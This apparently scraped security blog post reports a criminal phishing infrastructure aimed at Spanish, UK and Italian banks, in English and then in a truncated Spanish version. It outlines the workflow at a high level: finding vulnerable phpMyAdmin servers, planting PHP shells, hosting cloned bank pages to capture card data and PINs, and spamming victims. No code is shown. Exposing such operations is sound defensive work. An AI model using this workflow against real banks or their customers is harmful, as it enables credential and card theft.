<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Tabla normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0cm;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">It was discovered a site containing a complete full
infrastructure for preparing phishings attacks. In this criminal site has been
found all kind of malicious scripts, phishings kits, exploits & spam tools
necessary to carry out fraudulent activities to steal credentials and obtain
confidential user data from bank financial institutions in Europe, mainly in
Spain, UK and Italy.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US"> With all this amount of malicious material is possible
to do a complete fraud lifecycle.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">About traces and comments in malicious scripts it
seems that this infrastructure belongs to Romanian criminal groups.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The workflow of criminals takes place in three stages</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US"> </span></span></span> </div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">A first step in locating legitimate Internet servers that have installed Phpmyadmin database management application, and have installed phpMyAdmin versions 3.3.10.2 <span style="font-size: small;">y</span> <span style="font-size: small;"></span>3.4.3.1 vulnerable to certain exploits designed by criminals to upload malicious code to that legitimate server.<br /></span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">To find that phpmyadmin vulnerable servers, the
exploit script send requests on Bing searcher to find web addresses that
contain in its URL the following directory paths:</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s400/myadmin.jpg" width="173" /></a></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">These malicious scripts exploit a weakness in the
server configuration options of phpmyadmin application to upload a phpshell
that allows criminals to take full control of hacked machine.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The next stage is basically the preparing the phishing
of target banks. Criminals use the phpshell uploaded previously in compromised
server to upload the phishing kit. This kit usually consists a compressed file
type .Zip containing the exact clone copy of the financial institution against criminals
want to perform the phishing attack.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The main purpose of these phishings is to obtain
confidential data from credit card of costumers pretending to be legitimate
bank requests to the client.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">For this cause phishings simulate legitimate pages of
the bank, but criminals are not interested in doing electronic banking fraud
operations. They use phishings to obtain supplement data from the credit cards
of customers and especially to get the ATM PIN code of credit card. This ATM
PIN code is used to hire and activate financial services against the crefit
card that will be used by criminals for fraudulent business transactions or to
be used in electronic commerce.</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nvDxbifkJVs/UNRNooBSZbI/AAAAAAAAAVE/K85sKdro0Ac/s1600/3-B.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kWIQJFfq_kE/UNRKnEC1RdI/AAAAAAAAAUQ/RVi35_lQ554/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="http://1.bp.blogspot.com/-kWIQJFfq_kE/UNRKnEC1RdI/AAAAAAAAAUQ/RVi35_lQ554/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-1tOSD2ZXoEU/UNRKqOhhphI/AAAAAAAAAUY/2Xi0KC4fUFg/s400/2.jpg" width="387" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s1600/popular.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://3.bp.blogspot.com/-eSq1oZRUmJw/UNROPvDocNI/AAAAAAAAAVc/RL6FYf0HpC0/s320/popular.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-tz6wSxsf0qQ/UNRN_zJ5tcI/AAAAAAAAAVU/oW_vRIDx-PI/s320/7.jpg" width="221" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://1.bp.blogspot.com/-6YbEOgqasNs/UNRN7k4MdlI/AAAAAAAAAVM/9utVAzl9j3s/s320/5.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://1.bp.blogspot.com/-_jw7aXsW7z4/UNRPB6XgRZI/AAAAAAAAAVs/fZ9T7iq1OPw/s400/4.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PgndYdOa1S0/UNROmxIS85I/AAAAAAAAAVk/2tjres0JZUU/s1600/wells2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-PgndYdOa1S0/UNROmxIS85I/AAAAAAAAAVk/2tjres0JZUU/s1600/wells2.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The last stage of the fraud will be to launch a massive
spam campaign with emails containing that fake URLs where are hosted phishings
to try to trick users to visit that fraudulent addresses and claiming<span> </span>to complete their confidential bank details.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">
</span></span><div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">The SPAM tools and mail address lists for spamming are
also hosted on the criminal located server:</span></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s1600/wells.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://4.bp.blogspot.com/-zfZK13bcx0M/UNRP3LkvVUI/AAAAAAAAAV4/HGU5LwV-N-4/s640/wells.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-35132335036394308882012-12-21T04:04:00.001-08:002012-12-21T04:09:25.624-08:00Infraestructura criminal para preparación de ataques por Phishing<span style="font-family: "Arial","sans-serif";">Ha sido descubierto un site alojado en direcciones de Yahoo conteniendo toda la infraestructura completa de preparación de ataques por phishings. En este site criminal se ha localizado todo tipo de scripts , phishings kits , exploits , herramientas de SPAM necesario para la realización de actividades fraudulentas de robo de credenciales y obtención de datos confidenciales contra entidades financieras bancarias de Europa , principalmente de España , Reino Unido e Italia</span> <br />
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-bpztT0-3j0Q/UNRKrjt6GaI/AAAAAAAAAUg/zHGYvPckSN0/s400/6.jpg" width="255" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">Con tal cantidad de material malicioso es posible realizar el ciclo de fraude completo.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">Por las trazas y comentarios que aparecen en los scripts maliciosos todo parece indicar que esta infraestructura pertenece a grupos criminales de Rumania.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">La forma de proceder de los delincuentes se realiza en 3 fases:</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">Una primera fase de localización en Internet de servidores legítimos que tengan instalados la aplicación de gestión de base de datos Phpmyadmin, y que tengan instalada las versiones<span style="mso-spacerun: yes;"> </span>phpMyAdmin < 3.3.10.2 & < 3.4.3.1 vulnerables a ciertos exploits diseñados por los criminales para poder subir código malicioso al servidor legitimo.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s1600/myadmin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-ehzPfbCir7Q/UNRLAYTBYWI/AAAAAAAAAUo/HAeXgiFq7kU/s640/myadmin.jpg" width="276" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">Para localizar estos servidores phpmyadmin vulnerables lanzan mediante scripts peticiones en el buscador BING para encontrar las direcciones de Internet que contengan en su URL las siguientes rutas que se mustran en la imagen.</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-fareast-language: ES; mso-no-proof: yes;"></span><span style="font-family: "Arial","sans-serif";"></span></div>
<div class="MsoNormal">
